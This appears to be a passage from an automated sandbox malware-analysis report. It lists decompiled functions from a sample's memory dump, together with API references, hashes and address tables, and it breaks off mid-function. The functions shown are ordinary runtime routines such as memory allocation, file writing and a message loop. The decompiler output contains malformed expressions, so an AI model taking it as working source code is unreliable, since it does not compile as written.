Opcode Fuzzy Hash: 7e3546227060cc9c05aa29c6dd030ea43cb70f558f56a0c6a560f6836b52baa2
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00423B4C(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E00420C62(_t19, _t24, _t25, _a4); // executed
					if(_t10 != 0) {
						break;
					}
					if(E0042793D(_t10, _a4) == 0) {
						_push(1);
						_v16 = "bad allocation";
						_t22 =  &_v28;
						E00430D21(_t22,  &_v16);
						_v28 = 0x4cf748;
						E00430ECA( &_v28, 0x50793c);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x4cf748;
						E00430D91(_t22);
						if((_v32 & 0x00000001) != 0) {
							L00422587(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00620000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5

std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: 5a30cb00e75dcdab980d2d32e4f562ff827087a40d750860f30e7c3bc12dc385
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: 5a30cb00e75dcdab980d2d32e4f562ff827087a40d750860f30e7c3bc12dc385
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86
filestringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040F0E0(intOrPtr* __ecx, char _a4, intOrPtr _a24) {
				struct _OVERLAPPED* _v8;
				intOrPtr _v16;
				char _v17;
				long _v24;
				intOrPtr _v28;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t23;
				intOrPtr _t25;
				void* _t31;
				intOrPtr* _t35;
				signed int _t37;
				short* _t40;
				void* _t43;
				intOrPtr* _t46;
				CHAR* _t49;
				intOrPtr _t50;
				void* _t51;
				short* _t53;

				_push(0xffffffff);
				_push(E004CAA48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_t51 = _t50 - 0x20;
				_push(_t31);
				_t46 = __ecx;
				_v8 = 0;
				_t22 =  >=  ? _a4 :  &_a4;
				_t23 = CreateFileW( >=  ? _a4 :  &_a4, 0x40000000, 2, 0, 2, 0x80, 0); // executed
				_t43 = _t23;
				if(_t43 == 0xffffffff) {
					L8:
					if(_a24 >= 8) {
						_t23 = L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t23;
				}
				_t53 = _t51 - 0x18;
				_v17 = 0;
				_t40 = _t53;
				 *((intOrPtr*)(_t40 + 0x14)) = 7;
				 *(_t40 + 0x10) = 0;
				 *_t40 = 0;
				if( *_t46 != 0) {
					_t35 = _t46;
					_t8 = _t35 + 2; // 0x2
					_t31 = _t8;
					do {
						_t25 =  *_t35;
						_t35 = _t35 + 2;
					} while (_t25 != 0);
					_t37 = _t35 - _t31 >> 1;
					L6:
					_push(_t37);
					E00415C10(_t31, _t40, _t43, _t46, _t46);
					E00412840( &_v48, _v17); // executed
					_t51 = _t53 + 0x18;
					_t49 =  >=  ? _v48 :  &_v48;
					WriteFile(_t43, _t49, lstrlenA(_t49),  &_v24, 0); // executed
					_t23 = CloseHandle(_t43);
					if(_v28 >= 0x10) {
						_t23 = L00422587(_v48);
						_t51 = _t51 + 4;
					}
					goto L8;
				}
				_t37 = 0;
				goto L6;
			}

0x0040f0e3
0x0040f0e5
0x0040f0f0
0x0040f0f1
0x0040f0f8
0x0040f0fb
0x0040f0fe
0x0040f10b
0x0040f11b
0x0040f125
0x0040f12b
0x0040f130
0x0040f1bf
0x0040f1c3
0x0040f1c8
0x0040f1cd
0x0040f1d5
0x0040f1e0
0x0040f1e0
0x0040f136
0x0040f139
0x0040f13d
0x0040f141
0x0040f148
0x0040f14f
0x0040f155
0x0040f15b
0x0040f15d
0x0040f15d
0x0040f160
0x0040f160
0x0040f163
0x0040f166
0x0040f16d
0x0040f16f
0x0040f16f
0x0040f173
0x0040f17e
0x0040f183
0x0040f190
0x0040f1a1
0x0040f1a8
0x0040f1b2
0x0040f1b7
0x0040f1bc
0x0040f1bc
0x00000000
0x0040f1b2
0x0040f157
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: e7bfa81e947bc27759b8ab1fc6419497722b83581183109e63c95d0c44b06b23
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: e7bfa81e947bc27759b8ab1fc6419497722b83581183109e63c95d0c44b06b23
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00411AB0 Relevance: 4.5, APIs: 3, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411AB0() {
				struct tagMSG _v32;
				int _t6;

				_t6 = PeekMessageW( &_v32, 0, 0, 0, 1); // executed
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					while(_v32.message != 0x12) {
						DispatchMessageW( &_v32);
						if(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 1;
				}
				L6:
			}

0x00411aca
0x00411ace
0x00411af5
0x00411afb
0x00411ad0
0x00411ad6
0x00411ae0
0x00411af2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00411af2
0x00411b03
0x00411b03
0x00000000

APIs

PeekMessageW.USER32 ref: 00411ACA
DispatchMessageW.USER32 ref: 00411AE0
PeekMessageW.USER32 ref: 00411AEE

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$Peek$Dispatch
String ID:
API String ID: 14830804-0
Opcode ID: 7f40edd392db81d6522a06ff111facb367b84e6f02b96f2d700eafeb4f1e8a26
Instruction ID: a1c17368cc6fdfa08c727d52e015230d52eaed9b0517d6508992bcb0d81ef71e
Opcode Fuzzy Hash: 7f40edd392db81d6522a06ff111facb367b84e6f02b96f2d700eafeb4f1e8a26
Instruction Fuzzy Hash: F2F0B432E4130962DF2096996C42FEB7BAC9B44B10F140053FB04A71D0D6E5A44286E4

Uniqueness

Uniqueness Score: -1.00%

Function 00454C00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00454AE0: GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
Part of subcall function 00454AE0: GetFileType.KERNEL32(00000000), ref: 00454B05
Part of subcall function 00454AE0: __vfwprintf_p.LIBCMT ref: 00454B27

_raise.LIBCMT ref: 00454C18

Part of subcall function 0042A12E: __getptd_noexit.LIBCMT ref: 0042A16B

Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6

Strings

%s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00454C0C

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
String ID: %s(%d): OpenSSL internal error, assertion failed: %s
API String ID: 2149077303-4210838268
Opcode ID: c8b60d106a6ddf9770fe8ded3b270afc7ab6773223e56d6f9ab2ba1de5c26324
Instruction ID: fa72e03f5863b2a05375eef283b674a1c5903e86e1e3734bc2555e426bc738f9
Opcode Fuzzy Hash: c8b60d106a6ddf9770fe8ded3b270afc7ab6773223e56d6f9ab2ba1de5c26324
Instruction Fuzzy Hash: 6FD09E795892107FED022791EC07A1E7A51AF9471CF808419F69A041A2D6768534AA5B

Uniqueness

Uniqueness Score: -1.00%

Function 00423A38 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00423A38(void* __ebx, signed int __edi, void* __esi, void* __eflags) {
				signed int _t18;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;

				_push(0xc);
				_push(0x507920);
				E00428520(__ebx, __edi, __esi);
				_t28 = __edi | 0xffffffff;
				 *(_t31 - 0x1c) = __edi | 0xffffffff;
				_t30 =  *((intOrPtr*)(_t31 + 8));
				_t33 = _t30;
				_t34 = _t33 != 0;
				if(_t33 != 0) {
					__eflags =  *(_t30 + 0xc) & 0x00000040;
					if(( *(_t30 + 0xc) & 0x00000040) == 0) {
						E00420E53(_t30);
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t18 = E004239CC(__ebx, _t30); // executed
						_t28 = _t18;
						 *(_t31 - 0x1c) = _t18;
						 *(_t31 - 4) = 0xfffffffe;
						E00423AA7(_t30);
					} else {
						 *(_t30 + 0xc) =  *(_t30 + 0xc) & 0x00000000;
					}
				} else {
					 *((intOrPtr*)(E00425208(_t34))) = 0x16;
					E004242D2();
				}
				return E00428565(_t28);
			}

0x00423a38
0x00423a3a
0x00423a3f
0x00423a44
0x00423a47
0x00423a4c
0x00423a4f
0x00423a54
0x00423a56
0x00423a70
0x00423a74
0x00423a7d
0x00423a83
0x00423a88
0x00423a8e
0x00423a90
0x00423a93
0x00423a9a
0x00423a76
0x00423a76
0x00423a76
0x00423a58
0x00423a5d
0x00423a63
0x00423a63
0x00423a6f

APIs

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__lock_file.LIBCMT ref: 00423A7D

Part of subcall function 00420E53: __lock.LIBCMT ref: 00420E76

__fclose_nolock.LIBCMT ref: 00423A88

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 12bd1d3cff3597424f6cf441e7f6ef2d7829569bf8c2b731cad610acca9b362c
Instruction ID: e9f7363e2c125346a9344b83ccdc7017391740cbbddd1805e0fe7159b8e2b74d
Opcode Fuzzy Hash: 12bd1d3cff3597424f6cf441e7f6ef2d7829569bf8c2b731cad610acca9b362c
Instruction Fuzzy Hash: 1EF0F631B01724AAD710AF66680275E6AB46F00339F90815FE4A09A1C1CB7C87428F59

Uniqueness

Uniqueness Score: -1.00%

Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E0042FB64(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t13;

				_push(8);
				_push(0x507df0);
				_t4 = E00428520(__ebx, __edi, __esi);
				if( *0x51106c == 0) {
					E00428AF7(6);
					 *(_t13 - 4) =  *(_t13 - 4) & 0x00000000;
					_t16 =  *0x51106c;
					if( *0x51106c == 0) {
						E0042FE47(__ebx, __edx, __edi, __esi, _t16); // executed
						 *0x51106c =  *0x51106c + 1;
					}
					 *(_t13 - 4) = 0xfffffffe;
					_t4 = E0042FBAB();
				}
				return E00428565(_t4);
			}

0x0042fb64
0x0042fb66
0x0042fb6b
0x0042fb77
0x0042fb7b
0x0042fb81
0x0042fb85
0x0042fb8c
0x0042fb8e
0x0042fb93
0x0042fb93
0x0042fb99
0x0042fba0
0x0042fba0
0x0042fbaa

APIs

__lock.LIBCMT ref: 0042FB7B

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(00000000,?,004250D7,0000000D), ref: 00428B22

__tzset_nolock.LIBCMT ref: 0042FB8E

Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
String ID:
API String ID: 360932542-0
Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00416950 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00416950(intOrPtr* __ecx, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t30;
				void* _t33;
				intOrPtr* _t34;
				intOrPtr _t45;
				unsigned int _t48;
				signed int _t49;
				unsigned int _t53;
				intOrPtr* _t54;
				intOrPtr* _t58;
				signed int _t61;
				intOrPtr* _t64;
				intOrPtr _t69;
				intOrPtr _t70;

				_push(0xffffffff);
				_push(E004CAD80);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t69;
				_t70 = _t69 - 0xc;
				_t30 = _a4;
				_push(_t48);
				_v20 = _t70;
				_t61 = _t30 | 0x00000007;
				_t64 = __ecx;
				_v28 = __ecx;
				if(_t61 <= 0x7ffffffe) {
					_t48 =  *(__ecx + 0x14);
					_t53 = _t48 >> 1;
					_t56 = 0xaaaaaaab * _t61 >> 0x20 >> 1;
					__eflags = _t53 - 0xaaaaaaab * _t61 >> 0x20 >> 1;
					if(__eflags > 0) {
						_t61 = _t53 + _t48;
						__eflags = _t48 - 0x7ffffffe - _t53;
						if(__eflags > 0) {
							_t61 = 0x7ffffffe;
						}
					}
				} else {
					_t61 = _t30;
				}
				_t10 = _t61 + 1; // 0x7fffffff
				_t33 = _t10;
				_v8 = 0;
				_t54 = 0;
				_v24 = 0;
				if(_t33 == 0) {
					L9:
					_t49 = _a8;
					__eflags = _t49;
					if(_t49 != 0) {
						__eflags =  *(_t64 + 0x14) - 8;
						if( *(_t64 + 0x14) < 8) {
							_t58 = _t64;
						} else {
							_t58 =  *_t64;
						}
						__eflags = _t49;
						if(_t49 != 0) {
							E0042D8D0(_t54, _t58, _t49 + _t49);
							_t70 = _t70 + 0xc;
						}
					}
					__eflags =  *(_t64 + 0x14) - 8;
					if( *(_t64 + 0x14) >= 8) {
						L00422587( *_t64);
					}
					_t34 = _v24;
					 *_t64 = _t34;
					 *(_t64 + 0x14) = _t61;
					 *(_t64 + 0x10) = _t49;
					__eflags = _t61 - 8;
					if(_t61 >= 8) {
						_t64 = _t34;
					}
					__eflags = 0;
					 *((short*)(_t64 + _t49 * 2)) = 0;
					 *[fs:0x0] = _v16;
					return 0;
				} else {
					_t75 = _t33 - 0x7fffffff;
					if(_t33 > 0x7fffffff) {
						L8:
						E0044F1BB(_t76);
						_t40 = _a4;
						_v20 = _t70;
						_v8 = 2;
						_v24 = E00415E50(_t48, _t61, _t40 + 1);
						return 0x416a01;
					} else {
						_t45 = E00423B4C(_t48, _t56, _t61, _t75, _t33 + _t33); // executed
						_t54 = _t45;
						_t70 = _t70 + 4;
						_v24 = _t54;
						_t76 = _t54;
						if(_t54 != 0) {
							goto L9;
						} else {
							goto L8;
						}
					}
				}
			}

0x00416953
0x00416955
0x00416960
0x00416961
0x00416968
0x0041696b
0x0041696e
0x00416973
0x00416976
0x00416979
0x0041697b
0x00416984
0x0041698a
0x00416996
0x00416998
0x0041699a
0x0041699c
0x004169a3
0x004169a8
0x004169aa
0x004169ac
0x004169ac
0x004169aa
0x00416986
0x00416986
0x00416986
0x004169b1
0x004169b1
0x004169b4
0x004169bb
0x004169bd
0x004169c2
0x00416a0d
0x00416a0d
0x00416a10
0x00416a12
0x00416a14
0x00416a18
0x00416a4b
0x00416a1a
0x00416a1a
0x00416a1a
0x00416a4d
0x00416a4f
0x00416a57
0x00416a5c
0x00416a5c
0x00416a4f
0x00416a5f
0x00416a63
0x00416a67
0x00416a6c
0x00416a6f
0x00416a72
0x00416a74
0x00416a77
0x00416a7a
0x00416a7d
0x00416a7f
0x00416a7f
0x00416a84
0x00416a86
0x00416a8c
0x00416a97
0x004169c4
0x004169c4
0x004169c9
0x004169df
0x004169df
0x004169e4
0x004169eb
0x004169ef
0x004169f8
0x00416a00
0x004169cb
0x004169ce
0x004169d3
0x004169d5
0x004169d8
0x004169db
0x004169dd
0x00000000
0x00000000
0x00000000
0x00000000
0x004169dd
0x004169c9

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004169DF

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
String ID:
API String ID: 120817956-0
Opcode ID: e228db8f2929126c3b1913005bb93d35ef70577a56d5a0348c895a46b4dbfa9c
Instruction ID: aa06b8048d3bf760f527e7d0bbb9ad0a08af858ba63749c6f8d7f01112261dfe
Opcode Fuzzy Hash: e228db8f2929126c3b1913005bb93d35ef70577a56d5a0348c895a46b4dbfa9c
Instruction Fuzzy Hash: E731E3B2A006059BCB20DF68C5816AEB7F9EF45750F21823FE856D7740DB38DD448BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00416760 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00416760(intOrPtr* __ecx, signed int _a4, void* _a7, intOrPtr _a8) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t29;
				signed int _t32;
				intOrPtr* _t33;
				unsigned int _t43;
				intOrPtr _t44;
				unsigned int _t48;
				void* _t49;
				intOrPtr* _t51;
				signed int _t57;
				intOrPtr* _t60;
				intOrPtr _t65;
				intOrPtr _t66;

				_push(0xffffffff);
				_push(E004CAD70);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t65;
				_t66 = _t65 - 0xc;
				_t29 = _a4;
				_push(_t43);
				_v20 = _t66;
				_t57 = _t29 | 0x0000000f;
				_t60 = __ecx;
				_v28 = __ecx;
				if(_t57 <= 0xfffffffe) {
					_t43 =  *(__ecx + 0x14);
					_t48 = _t43 >> 1;
					_t53 = 0xaaaaaaab * _t57 >> 0x20 >> 1;
					__eflags = _t48 - 0xaaaaaaab * _t57 >> 0x20 >> 1;
					if(__eflags > 0) {
						_t57 = _t48 + _t43;
						__eflags = _t43 - 0xfffffffe - _t48;
						if(__eflags > 0) {
							_t57 = 0xfffffffe;
						}
					}
				} else {
					_t57 = _t29;
				}
				_t10 = _t57 + 1; // 0xffffffff
				_t49 = _t10;
				_v8 = 0;
				_t32 = 0;
				_v24 = 0;
				if(_t49 == 0) {
					L9:
					_t44 = _a8;
					__eflags = _t44;
					if(_t44 != 0) {
						__eflags =  *(_t60 + 0x14) - 0x10;
						if( *(_t60 + 0x14) < 0x10) {
							_t51 = _t60;
						} else {
							_t51 =  *_t60;
						}
						__eflags = _t44;
						if(_t44 != 0) {
							E0042D8D0(_t32, _t51, _t44);
							_t66 = _t66 + 0xc;
						}
					}
					__eflags =  *(_t60 + 0x14) - 0x10;
					if( *(_t60 + 0x14) >= 0x10) {
						L00422587( *_t60);
					}
					_t33 = _v24;
					 *_t60 = 0;
					 *_t60 = _t33;
					 *(_t60 + 0x14) = _t57;
					 *((intOrPtr*)(_t60 + 0x10)) = _t44;
					__eflags = _t57 - 0x10;
					if(_t57 >= 0x10) {
						_t60 = _t33;
					}
					 *((char*)(_t60 + _t44)) = 0;
					 *[fs:0x0] = _v16;
					return _t33;
				} else {
					_t71 = _t49 - 0xffffffff;
					if(_t49 > 0xffffffff) {
						L8:
						E0044F1BB(0);
						_t37 = _a4;
						_v24 = _a4;
						_v20 = _t66;
						_v8 = 2;
						_a4 = E00415950(_t43, _t57, _t37 + 1);
						return 0x41680b;
					} else {
						_t32 = E00423B4C(_t43, _t53, _t57, _t71, _t49); // executed
						_t66 = _t66 + 4;
						_v24 = 0;
						if(0 != 0) {
							goto L9;
						} else {
							goto L8;
						}
					}
				}
			}

0x00416763
0x00416765
0x00416770
0x00416771
0x00416778
0x0041677b
0x0041677e
0x00416783
0x00416786
0x00416789
0x0041678b
0x00416791
0x00416797
0x004167a3
0x004167a5
0x004167a7
0x004167a9
0x004167b0
0x004167b5
0x004167b7
0x004167b9
0x004167b9
0x004167b7
0x00416793
0x00416793
0x00416793
0x004167be
0x004167be
0x004167c1
0x004167c8
0x004167ca
0x004167cf
0x00416817
0x00416817
0x0041681a
0x0041681c
0x0041681e
0x00416822
0x00416855
0x00416824
0x00416824
0x00416824
0x00416857
0x00416859
0x0041685e
0x00416863
0x00416863
0x00416859
0x00416866
0x0041686a
0x0041686e
0x00416873
0x00416876
0x00416879
0x0041687c
0x0041687e
0x00416881
0x00416884
0x00416887
0x00416889
0x00416889
0x0041688e
0x00416894
0x0041689f
0x004167d1
0x004167d1
0x004167d4
0x004167e6
0x004167e6
0x004167eb
0x004167f1
0x004167f5
0x004167f9
0x00416802
0x0041680a
0x004167d6
0x004167d7
0x004167dc
0x004167df
0x004167e4
0x00000000
0x00000000
0x00000000
0x00000000
0x004167e4
0x004167d4

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004167E6

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
String ID:
API String ID: 120817956-0
Opcode ID: e14d4706ebd2937f549925ab355345f0cc1dac9e10c7ad741e7fc5df18ade2da
Instruction ID: efb258ddcfae47249c3acbfcaa5a8e986a9cbccba7edf1416c99c2e95f316cd5
Opcode Fuzzy Hash: e14d4706ebd2937f549925ab355345f0cc1dac9e10c7ad741e7fc5df18ade2da
Instruction Fuzzy Hash: B83126B1A016019FDB24DF29C5807AEBBF4EB40364F104A2EE426977C0D738DA80C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00416570 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00416570(intOrPtr* __ecx, signed int _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr _t36;
				intOrPtr _t43;
				intOrPtr* _t45;
				signed int _t53;
				void* _t55;
				signed int _t61;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t67;

				_push(0xffffffff);
				_push(E004CAD60);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_t67 = _t66 - 8;
				_t61 = _a4;
				_t64 = 0;
				_v20 = _t67;
				_t45 = __ecx;
				_v24 = 0;
				if(_t61 != 0) {
					_t72 = _t61 - 0x9249249;
					if(_t61 > 0x9249249) {
						L3:
						E0044F1BB(_t73);
					} else {
						_t43 = E00423B4C(__ecx, _t55, _t61, _t72, _t61 * 8 - _t61 << 2); // executed
						_t64 = _t43;
						_t67 = _t67 + 4;
						_v24 = _t64;
						_t73 = _t64;
						if(_t64 == 0) {
							goto L3;
						}
					}
				}
				_v8 = 0;
				_push(_a4);
				E00419850( *_t45,  *((intOrPtr*)(_t45 + 4)), _t64); // executed
				_t30 =  *_t45;
				_t53 = ((0x92492493 * ( *((intOrPtr*)(_t45 + 4)) -  *_t45) >> 0x20) +  *((intOrPtr*)(_t45 + 4)) -  *_t45 >> 4 >> 0x1f) + ((0x92492493 * ( *((intOrPtr*)(_t45 + 4)) -  *_t45) >> 0x20) +  *((intOrPtr*)(_t45 + 4)) -  *_t45 >> 4);
				_a4 = _t53;
